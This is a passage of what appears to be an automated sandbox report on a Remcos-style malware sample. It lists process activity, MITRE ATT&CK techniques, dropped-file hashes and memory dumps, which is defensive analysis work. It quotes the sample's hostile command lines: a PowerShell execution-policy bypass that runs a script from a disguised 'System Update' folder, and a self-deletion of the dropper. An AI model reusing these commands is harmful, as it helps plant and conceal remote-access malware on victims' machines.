  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\tktic.ps1"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3412
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:1700
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:3364
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\d9ae1ca2c79c25731a8a5c2bbe4fda94d99a24cb58b653a5b46371c461c9b2a9.vbs"
      4⤵
      PID:1108

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
9b72210a0d7dcc2ab60bedf4c9e4188a

SHA1
47b557fcb5476eff6bbcbbf3eacaf3e6fe030ca4

SHA256
0ec46addcc31d7a5da6882e3704e55166233553d2b13517078106bac5ffaf275

SHA512
5450fbc7eb0a7fb1fec7a771bcc3388c302b631870dbdfd295dd8b3790bbd7767e9d486b366e97d688b5eba37e607057d9f79845e1730c6972b43c6959cf2576

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\tktic.ps1

Filesize
1.7MB

MD5
46153d1e4e7f4151898a8c84bbfa1037

SHA1
eb4dcd68cce1346869a5c2ec55430968ab683df5

SHA256
6104acedbcfcdaa76ad7e685a79d2581af61e8763f0b57c587df52c870a7a708

SHA512
b4ead3814d5f8d04eaef62b0b457878f08453917b3de06b1fa2a9e67bf6107240fb98fbee8a09aae86ab9b21f5a1e321f5915dfbe179bd95cdb2a0a34bd69914

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

Filesize
336B

MD5
bf9108f93c7d99940ba413b55410aa7c

SHA1
8d0917acedcfd14f7434e052a404d5c23bc43497

SHA256
9062eeb629c7a4ebb9c28f26d4ef54f3ed7711be4506241585a2564a4ea2056e

SHA512
9190368e3f47d8dcf537d869fc9e6d6f92c353e5fdbf48d08871fa7709619d32bca8be028b4b374e6a9d12f281c2a91d9614130b46789e46ecb041cdbb452cdf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
360B

MD5
9c55101be2ebfdb081df7c244c716cc3

SHA1
fdaa04885c4e66ff74233b300bb2c7b9cf361c1f

SHA256
1b3931bfac2580bc46999fd6287dddddc7176cac7886bcf3ad6c45a3eff5102f

SHA512
33caf3447d23dd060453efb1a8980853ae7309b436f9bff4fa5ebf3afb9e0e649a434cc525c8da650d31a3f1f595d84f6be48da67242215d4889a8a9b6ffc262

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
393265b3a7faef4e3735373c6e80a9cc

SHA1
dad53df6e255e2e665e860be5e6cccae6bcdb272

SHA256
15237ab749ba11b6328e9ee2b53c5f07497011049903a1a19054d2a2150777ba

SHA512
3c1d0b64b3bfab20859acced58f4bca3ba48bd1f066f12a9058d93a49e0e62a13a4c1d2e6ac380b2e37a32224c09f611982d7b81f58b19bd5adac955747e0fed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
c1a54dd5a1ab44cc4c4afd42f291c863

SHA1
b77043ab3582680fc96192e9d333a6be0ae0f69d

SHA256
c6dce870a896f3531ae7a10a0c2096d2eb7eb5989ae783aefea6150279502d75

SHA512
010f5093f58b0393d17c824a357513cf4f06239ccddd86c2e0581347ef3b8e7b93f869b0770bdaeb000e4fda7e14f49b9e45663a3839ab049446e9fe08ec535d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zawp45ep.nyx.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/392-12-0x00007FFB38980000-0x00007FFB39441000-memory.dmp

Filesize
10.8MB

Download
memory/392-0-0x00007FFB38983000-0x00007FFB38985000-memory.dmp

Filesize
8KB

Download
memory/392-11-0x00007FFB38980000-0x00007FFB39441000-memory.dmp

Filesize
10.8MB

Download
memory/392-61-0x00007FFB38983000-0x00007FFB38985000-memory.dmp

Filesize
8KB

Download
memory/392-67-0x00007FFB38980000-0x00007FFB39441000-memory.dmp

Filesize
10.8MB

Download
memory/392-2-0x0000020A58140000-0x0000020A58162000-memory.dmp

Filesize
136KB

Download
memory/3364-82-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3364-94-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3364-84-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3364-86-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3364-87-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3364-90-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3364-91-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3364-92-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3364-93-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3364-125-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3364-100-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3364-101-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3364-124-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3364-108-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3364-109-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3364-116-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3364-117-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/3412-81-0x0000012636070000-0x000001263607A000-memory.dmp

Filesize
40KB

Download
memory/4352-22-0x000001AB6A320000-0x000001AB6A32A000-memory.dmp

Filesize
40KB

Download